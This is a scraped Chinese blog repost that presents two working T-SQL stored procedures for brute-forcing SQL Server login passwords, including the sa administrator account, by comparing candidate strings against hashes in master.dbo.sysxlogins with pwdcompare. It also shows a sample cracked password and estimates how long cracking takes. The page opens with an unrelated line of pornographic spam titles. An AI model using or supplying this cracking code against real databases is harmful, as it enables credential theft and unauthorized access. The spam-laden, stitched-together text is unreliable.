公交车上荫蒂添的好舒服的电影-公用玩物(np双xing总受)-公用小荡货芊芊-公与妇仑乱hd-攻把受做哭边走边肉楼梯play-古装一级淫片a免费播放口

　　代碼演示暴力破解MSSQL的帳號(hào)和密碼，包括管理員帳號(hào)sa的密碼。

　　今天看到網(wǎng)上有這樣一篇文章“一個(gè)SQL Server Sa密碼破解的存儲(chǔ)過程”：http://www.wangchao.net.cn/bbsdetail_1804540.html，方法就是暴力破解MSSQL的帳號(hào)和密碼，包括管理員帳號(hào)sa的密碼，發(fā)現(xiàn)寫的很好，不知原貼何處，網(wǎng)上有多處轉(zhuǎn)載，下面我對(duì)其它的代碼稍做修改，并進(jìn)行了一些性能分析。

　　首先說說破解過程序核心思想，就是存儲(chǔ)帳號(hào)密碼的master.dbo.sysxlogins表和未公布的密碼比較存儲(chǔ)過程pwdcompare。經(jīng)過一方分析，修改了部分代碼，下面貼出修改前后的代碼，

　　一個(gè)SQL Server Sa密碼破解的存儲(chǔ)過程

alter proc p_GetPassword
　　　 @username sysname=null, --用戶名,如果不指定,則列出所有用戶
　　　 @pwdlen int=2 --要破解的密碼的位數(shù),默認(rèn)是2位及以下的
as
　　　 set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end
　　　 select top 255 id=identity(int,0,1) into #t from syscolumns
　　　 alter table #t add constraint PK_#t primary key(id)
　　　 select name,password
　　　　　　　 ,type=case when xstatus&2048=2048 then 1 else 0 end
　　　　　　　 ,jm=case when password is null then 1 else 0 end
　　　　　　　 ,pwdstr=cast('' as sysname)
　　　　　　　 ,pwd=cast('' as varchar(8000))
　　　　　　　 into #pwd
　　　 from master.dbo.sysxlogins a
　　　 where srvid is null
　　　　　　　 and name=isnull(@username,name)
　　　 declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)
　　　 declare @l int
　　　 select @l=0
　　　　　　　 ,@s1='char(aa.id)'
　　　　　　　 ,@s2='cast(aa.id as varchar)'
　　　　　　　 ,@s3=',#t aa'
　　　 exec('
　　　　　　　 update pwd set jm=1,pwdstr='+@s1+'
　　　　　　　 ,pwd='+@s2+'
　　　　　　　 from #pwd pwd'+@s3+'
　　　　　　　 where pwd.jm=0
　　　　　　　 and pwdcompare('+@s1+',pwd.password,pwd.type)=1
　　　　　　　 ')
　　　 while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)
　　　 begin
　　　　　　　 select @l=@l+1
　　　　　　　 ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'
　　　　　　　 ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)'
　　　　　　　 ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
　　　　　　　 exec('
　　　　　　　 update pwd set jm=1,pwdstr='+@s1+'
　　　　　　　 ,pwd='+@s2+'
　　　　　　　 from #pwd pwd'+@s3+'
　　　　　　　 where pwd.jm=0
　　　　　　　 and pwdcompare('+@s1+',pwd.password,pwd.type)=1
　　　　　　　 ')
　　　 end
　　　 select 用戶名=name,密碼=pwdstr,密碼ASCII=pwd
　　　 from #pwd
GO

　　下面是我修改后的代碼：

　　修改后的SQL Server Sa密碼破解的存儲(chǔ)過程

alter proc p_GetPassword2
　　　 @username sysname=null, --用戶名,如果不指定,則列出所有用戶
　　　 @pwdlen int=2 --要破解的密碼的位數(shù),默認(rèn)是2位及以下的
as
　　　 set nocount on

　　　 if object_id(N'tempdb..#t') is not null
　　　　　　　 drop table #t
　　　 if object_id(N'tempdb..#pwd') is not null
　　　　　　　 drop table #pwd

　　　 set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

　　　 declare @ss varchar(256)
　　　 --select @ss= '123456789'
　　　 select @ss=　　　 'abcdefghijklmnopqrstuvwxyz'
　　　 select @ss=@ss+ '`0123456789-=[];,./'
　　　 select @ss=@ss+ '~!@#$%^&*()_+{}|:<>?'
　　　 --select @ss=@ss+　　　 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

　　　 create table #t(c char(1) not null)
　　　 alter table #t add constraint PK_#t primary key CLUSTERED (c)
　　　 declare @index int
　　　 select @index=1
　　　 while (@index <=len(@ss))
　　　 begin
　　　　　　　 insert #t select SUBSTRING(@ss, @index, 1)
　　　　　　　 select @index = @index +1
　　　 end

　　　 select name,password
　　　　　　　 ,type=case when xstatus&2048=2048 then 1 else 0 end
　　　　　　　 ,jm=case when password is null then 1 else 0 end
　　　　　　　 ,pwdstr=cast('' as sysname)
　　　　　　　 ,pwd=cast('' as varchar(8000))
　　　　　　　 ,times =cast('' as varchar(8000))
　　　　　　　 into #pwd
　　　 from master.dbo.sysxlogins a
　　　 where srvid is null
　　　　　　　 and name=isnull(@username,name)
　　　 declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000), @stimes varchar(8000)

　　　 declare @l int, @t bigint

　　　 select @t = count(1)*POWER(len(@ss),1) from #pwd

　　　 select @l=0
　　　　　　　 ,@s1='aa.c'
　　　　　　　 ,@s2='cast(ASCII(aa.c) as varchar)'
　　　　　　　 ,@s3=',#t aa'
　　　　　　　 ,@stimes='1th,' + cast(@t as varchar(20)) + 'rows'

　　　 exec('
　　　　　　　 update pwd set jm=1,pwdstr='+@s1+'
　　　　　　　 ,pwd='+@s2+'
　　　　　　　 from #pwd pwd'+@s3+'
　　　　　　　 where pwd.jm=0
　　　　　　　 and pwdcompare('+@s1+',pwd.password,pwd.type)=1
　　　　　　　 ')
　　　 while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)
　　　 begin
　　　　　　　 select @l=@l+1
　　　　　　　 select @t = count(1)*POWER(len(@ss),@l+1) from #pwd
　　　　　　　 print @t

　　　　　　　 select
　　　　　　　 @s1=@s1+'+'+char(@l/26+97)+char(@l%26+97)+'.c'
　　　　　　　 ,@s2=@s2+'+'',''+cast(ASCII('+char(@l/26+97)+char(@l%26+97)+'.c) as varchar)'
　　　　　　　 ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
　　　　　　　 ,@stimes=@stimes+';'+ cast(@l+1 as varchar(1)) + 'th,' + cast(@t as varchar(20)) + 'rows'

　　　　　　　 exec('
　　　　　　　 update pwd set jm=1,pwdstr='+@s1+'
　　　　　　　 ,pwd='+@s2+'
　　　　　　　 ,times='''+@stimes+'''
　　　　　　　 from #pwd pwd'+@s3+'
　　　　　　　 where pwd.jm=0
　　　　　　　 and pwdcompare('+@s1+',pwd.password,pwd.type)=1
　　　　　　　 ')
　　　 end
　　　 select 用戶名=name,密碼=pwdstr,密碼ASCII=pwd, 查詢次數(shù)和行數(shù)=times
　　　 from #pwd

　　　 if object_id(N'tempdb..#t') is not null
　　　　　　　 drop table #t
　　　 if object_id(N'tempdb..#pwd') is not null
　　　　　　　 drop table #pwd

　　我測(cè)試如下

　　p_GetPassword2 'b', 6

用戶名	密碼	密碼ASCII	查詢次數(shù)和行數(shù)
b	123	49,50,51	1th,66rows;2th,4356rows;3th,287496rows

　　性能分析:

　　本例以一個(gè)查詢能查詢bigint的最大值條記錄9223372036854775807為限做為主機(jī)最大性能，來粗略計(jì)算破解性能。

　　破解一個(gè)帳號(hào)的密碼長(zhǎng)度，破解時(shí)間和性能消耗，是以所有用于破解的字符長(zhǎng)度為底，以密碼長(zhǎng)度為指數(shù)的指數(shù)函數(shù)，即：破解帳號(hào)個(gè)數(shù) * （所有用于破解的字符個(gè)數(shù)）^{最長(zhǎng)密碼長(zhǎng)度次方} < 主機(jī)最大性能：

　　原存儲(chǔ)過程使用256個(gè)破解字符，理論上可以破解7位密碼，即256⁷<Max(bigint)。




　　我修改的存儲(chǔ)過程使用66個(gè)鍵盤常規(guī)字符，理論上可以破解10位密碼，即66¹⁰<Max(bigint)。




　　如果知道密碼是10個(gè)數(shù)字字符的組合，理論上可以破解19位密碼，即10¹⁹<Max(bigint)。